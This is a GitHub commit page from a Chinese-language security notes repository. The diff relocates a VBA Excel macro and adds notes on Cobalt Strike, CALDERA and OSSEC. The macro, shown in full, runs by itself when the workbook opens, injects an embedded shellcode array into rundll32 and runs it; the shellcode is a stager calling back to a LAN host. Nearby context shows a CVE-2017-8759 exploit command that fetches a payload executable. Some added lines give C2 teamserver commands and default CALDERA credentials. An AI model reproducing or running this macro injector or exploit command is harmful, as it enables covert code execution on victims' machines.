ADD: 添加多种flood攻击; 2. tcp资源耗尽;异常报文攻击;

JamesBonddu · May 9, 2019 · de0b882 · de0b882
1 parent 8fe0267
commit de0b882
Show file tree

Hide file tree

Showing 11 changed files with 361 additions and 99 deletions.
diff --git a/安全技能树/安全信息资源/博客资源.md b/安全技能树/安全信息资源/博客资源.md
@@ -0,0 +1,5 @@
+# 博客资源
+
+参考:
+
+[micro8](https://micro8.gitbook.io/micro8/)
diff --git a/安全技能树/安全信息资源/安全工具/CobaltStrike.md b/安全技能树/安全信息资源/安全工具/CobaltStrike.md
@@ -1,108 +1,57 @@
 # CobaltStrike
 
+## 侦察 Reconnaissance
+利用 System profile系统分析器发现目标系统的客户端应用程序.
 
+## 后渗透 Post Exploitation
+Beacon是CobaltStrike的有效载荷,可用来执行powershell脚本,记录键盘,截图屏幕,下载文件,生成其他有效负载等.
 
-## EXCEL 设置PAYLOAD宏病毒,
-[XLSM 启用宏](https://jingyan.baidu.com/article/90895e0ff08e1864ec6b0be9.html)
-
-```vb
-Private Type PROCESS_INFORMATION
-    hProcess As Long
-    hThread As Long
-    dwProcessId As Long
-    dwThreadId As Long
-End Type
-
-Private Type STARTUPINFO
-    cb As Long
-    lpReserved As String
-    lpDesktop As String
-    lpTitle As String
-    dwX As Long
-    dwY As Long
-    dwXSize As Long
-    dwYSize As Long
-    dwXCountChars As Long
-    dwYCountChars As Long
-    dwFillAttribute As Long
-    dwFlags As Long
-    wShowWindow As Integer
-    cbReserved2 As Integer
-    lpReserved2 As Long
-    hStdInput As Long
-    hStdOutput As Long
-    hStdError As Long
-End Type
-
-#If VBA7 Then
-    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
-    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
-    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
-    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
-#Else
-    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
-    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
-    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
-    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
-#End If
-
-Sub Auto_Open()
-    Dim myByte As Long, myArray As Variant, offset As Long
-    Dim pInfo As PROCESS_INFORMATION
-    Dim sInfo As STARTUPINFO
-    Dim sNull As String
-    Dim sProc As String
-
-#If VBA7 Then
-    Dim rwxpage As LongPtr, res As LongPtr
-#Else
-    Dim rwxpage As Long, res As Long
-#End If
-    myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84, _
-60,97,124,2,44,32,-63,-49,13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48, _
-80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1,-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3, _
-125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4,-117,1,-48,-119,68,36,36,91, _
-91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
--43,-24,-128,0,0,0,77,111,122,105,108,108,97,47,52,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
-83,73,69,32,55,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,48,41,0,88,88,88,88,88,88,88, _
-88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88, _
-88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88, _
-88,88,88,88,88,0,89,49,-1,87,87,87,87,81,104,58,86,121,-89,-1,-43,-21,121,91,49,-55,81,81,106,3,81,81, _
-104,-41,17,0,0,83,80,104,87,-119,-97,-58,-1,-43,-21,98,89,49,-46,82,104,0,2,96,-124,82,82,82,81,82,80,104, _
--21,85,46,59,-1,-43,-119,-58,49,-1,87,87,87,87,86,104,45,6,24,123,-1,-43,-123,-64,116,68,49,-1,-123,-10,116,4, _
--119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1,-43,49,-1,87,106,7,81,86,80,104,-73,87,-32, _
-11,-1,-43,-65,0,47,0,0,57,-57,116,-68,49,-1,-21,21,-21,73,-24,-103,-1,-1,-1,47,74,78,81,115,0,0,104,-16, _
--75,-94,86,-1,-43,106,64,104,0,16,0,0,104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,83,83,-119,-25,87,104, _
-0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43,-123,-64,116,-51,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,55,-1,-1,-1, _
-49,57,50,46,49,54,56,46,55,49,46,51,0)
-    If Len(Environ("ProgramW6432")) > 0 Then
-        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
-    Else
-        sProc = Environ("windir") & "\\System32\\rundll32.exe"
-    End If
-
-    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
-
-    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
-    For offset = LBound(myArray) To UBound(myArray)
-        myByte = myArray(offset)
-        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
-    Next offset
-    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
-End Sub
-Sub AutoOpen()
-    Auto_Open
-End Sub
-Sub Workbook_Open()
-    Auto_Open
-End Sub
+## 攻击包 Attack Packages
 
+将文件转换为木马:
+- Java Applet攻击
+- Microsoft Office文档
+- Microsoft Windows程序
+- 网站克隆工具
+
+## 隐蔽沟通 Covert Communication
+信标的网络指标具有可塑性.加载C2配置文件使其看起来像另一个攻击者.使用HTTP,HTTPS,和DNS去egress a network.通过SMB协议,使用命名管道去控制信标,点对点.
+
+## 鱼叉网络钓鱼
+
+发送钓鱼邮件
+
+## 浏览器透视
+使用浏览器数据透视图以双因素身份验证和访问网站作为目标.
+
+## 合作
+
+连接到 teamserver共享数据,实时通讯以及参与过程中控制受到危害的系统.
+
+## 报告和记录
+
+根据红队的活动提供一个时间表和指标单,这些报告旨在使我们的同行在安全运营中收益。可以导出为PDF和MS Word.
+
+信标的HTTP指标由Malleable C2配置文件控制.它指定如何转换数据并将其存储在事务中.转换和存储数据的相同配置文件也可以从事务中提取和恢复数据。
+
+```sh
+# 启动时指定配置文件
+./teamserver [外部IP] [密码] [/path/to/my.profile]
+# c2lint检查通信配置文件的语法,应用一些额外的检查甚至随机数据对配置文件进行单元测试.
+./c2lint  [/path/to/my.profile]
+
+# 配置文件参考
+https://github.com/rsmudge/Malleable-C2-Profiles
 ```
 
 参考:
 
+[cobaltstrike](https://www.cobaltstrike.com/)
+
 [CobaltStrike 安装](https://blog.csdn.net/qq_36374896/article/details/83961496)
 
 [cobaltstrike 安装破解教程](https://www.cnblogs.com/haq5201314/p/7040832.html)
 
-[DLL Hijacking 和 COM Hijacking Bypass UAC](https://zhuanlan.zhihu.com/p/55025929)
+[DLL Hijacking 和 COM Hijacking Bypass UAC](https://zhuanlan.zhihu.com/p/55025929)
+
+[Malleable Command and Control](https://www.cobaltstrike.com/help-malleable-c2)
diff --git a/安全技能树/安全信息资源/黑客工具资源.md b/安全技能树/安全信息资源/黑客工具资源.md
@@ -11,6 +11,49 @@ adversary emulation, 模拟攻击提供了一种用来测试网络在应对高
 
 [攻击模拟](https://www.4hou.com/web/11241.html)
 
+### CALDERA
+
+CALDERA专注于后渗透阶段.它包含一个逻辑编码,用于描述该技术的要求(前置条件)和技术的效果(后置条件).
+对手仿真的核心是red team,但是对手仿真不是使用攻击者的一般心态,而是采用特定现实世界对手的方法,参与的重点是让仿真团队和防御者共同努力改进系统,网络和防御过程,以更好地检测对手生命周期中使用的技术.
+
+限制: 1.决定不模仿C2,原因是已经存在几种模拟C2网络流量的工具.通过关注仿真的其他方面产生更大的影响.
+    - 实用角度: CALDERA最初是为测试基于主机的防御和传感器而创建的.基于主机的防御主要使用主机上的活动而不是网络上的。
+    - 哲学角度: C2协议很容易改变,且由很多变化,不同的差异会很大.
+
+```sh
+git clone https://github.com/mitre/caldera.git --recursive
+docker-compose up
+```
+
+默认账户密码
+username: admin
+password: caldera
+
+Logic是CALDERA能够自动运行的核心部分.每一个敌手动作,称为步骤在CALDERA包含的步骤的要求和影响的逻辑描述.
+CALDERA解析这些逻辑描述,以告知何时可以运行Step并预测Ste的结果.这让CALDERA通过迭代检测给定当前状态的那些步骤是可以执行的,选择步骤,然后根据逻辑规则生成该步骤的输出状态来生成[计划][planning]
+
+[caldera](https://caldera.readthedocs.io/en/latest/)
+
+[docker-compose install](https://docs.docker.com/compose/install/)
+
+[caldera install](https://caldera.readthedocs.io/en/latest/installation.html)
+
+[AI planning](https://www.isi.edu/~blythe/cs541/)
+
+
+## HIDS
+
+OSSEC分为三部分:
+Manager(or Server): Agents通过1514/udp端口连接Server,agents可以通过这个端口和server沟通.
+Agents
+
+
+参考:
+
+[ossec-hids github](https://github.com/ossec/ossec-hids)
+
+[ossec doc](http://www.ossec.net/docs/index.html)
+
 ## CTF 夺旗赛
 
-[CTF 夺旗赛资源](https://ctftime.org/)
+[CTF 夺旗赛资源](https://ctftime.org/)
diff --git a/安全技能树/渗透测试/Practice/实战1.md b/安全技能树/渗透测试/Practice/实战1.md
@@ -50,4 +50,102 @@ Final size of exe file: 7168 bytes
 
 #监听来自ppsx文件执行之后反弹的shell。
 #命令：python cve-2017-8759_toolkit.py -M exp -e http://192.168.72.3/shell.exe -l /root/8759shell.exe
+```
+
+
+## EXCEL 设置PAYLOAD宏病毒,
+[XLSM 启用宏](https://jingyan.baidu.com/article/90895e0ff08e1864ec6b0be9.html)
+
+```vb
+Private Type PROCESS_INFORMATION
+    hProcess As Long
+    hThread As Long
+    dwProcessId As Long
+    dwThreadId As Long
+End Type
+
+Private Type STARTUPINFO
+    cb As Long
+    lpReserved As String
+    lpDesktop As String
+    lpTitle As String
+    dwX As Long
+    dwY As Long
+    dwXSize As Long
+    dwYSize As Long
+    dwXCountChars As Long
+    dwYCountChars As Long
+    dwFillAttribute As Long
+    dwFlags As Long
+    wShowWindow As Integer
+    cbReserved2 As Integer
+    lpReserved2 As Long
+    hStdInput As Long
+    hStdOutput As Long
+    hStdError As Long
+End Type
+
+#If VBA7 Then
+    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
+    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
+    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
+    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
+#Else
+    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
+    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
+    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
+    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
+#End If
+
+Sub Auto_Open()
+    Dim myByte As Long, myArray As Variant, offset As Long
+    Dim pInfo As PROCESS_INFORMATION
+    Dim sInfo As STARTUPINFO
+    Dim sNull As String
+    Dim sProc As String
+
+#If VBA7 Then
+    Dim rwxpage As LongPtr, res As LongPtr
+#Else
+    Dim rwxpage As Long, res As Long
+#End If
+    myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84, _
+60,97,124,2,44,32,-63,-49,13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48, _
+80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1,-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3, _
+125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4,-117,1,-48,-119,68,36,36,91, _
+91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
+-43,-24,-128,0,0,0,77,111,122,105,108,108,97,47,52,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
+83,73,69,32,55,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,48,41,0,88,88,88,88,88,88,88, _
+88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88, _
+88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88,88, _
+88,88,88,88,88,0,89,49,-1,87,87,87,87,81,104,58,86,121,-89,-1,-43,-21,121,91,49,-55,81,81,106,3,81,81, _
+104,-41,17,0,0,83,80,104,87,-119,-97,-58,-1,-43,-21,98,89,49,-46,82,104,0,2,96,-124,82,82,82,81,82,80,104, _
+-21,85,46,59,-1,-43,-119,-58,49,-1,87,87,87,87,86,104,45,6,24,123,-1,-43,-123,-64,116,68,49,-1,-123,-10,116,4, _
+-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1,-43,49,-1,87,106,7,81,86,80,104,-73,87,-32, _
+11,-1,-43,-65,0,47,0,0,57,-57,116,-68,49,-1,-21,21,-21,73,-24,-103,-1,-1,-1,47,74,78,81,115,0,0,104,-16, _
+-75,-94,86,-1,-43,106,64,104,0,16,0,0,104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,83,83,-119,-25,87,104, _
+0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43,-123,-64,116,-51,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,55,-1,-1,-1, _
+49,57,50,46,49,54,56,46,55,49,46,51,0)
+    If Len(Environ("ProgramW6432")) > 0 Then
+        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
+    Else
+        sProc = Environ("windir") & "\\System32\\rundll32.exe"
+    End If
+
+    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
+
+    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
+    For offset = LBound(myArray) To UBound(myArray)
+        myByte = myArray(offset)
+        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
+    Next offset
+    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
+End Sub
+Sub AutoOpen()
+    Auto_Open
+End Sub
+Sub Workbook_Open()
+    Auto_Open
+End Sub
+
 ```
diff --git a/常用命令/系统常用命令/Linux/Linux常用命令.md b/常用命令/系统常用命令/Linux/Linux常用命令.md
@@ -6,8 +6,12 @@ iptables -I INPUT -p tcp -s ip --dport port -j ACCEPT
 # 添加默认路由
 route add -net 0.0.0.0/24  gw 192.168.18.2 em1
 route del  default gw 192.168.18.2 # 删除默认路由
+# 删除路由规则链
+iptables -F chainname 
 ```
 
+[iptables](http://www.zsythink.net/archives/1199)
+
 ## 访问socket
 
 ```json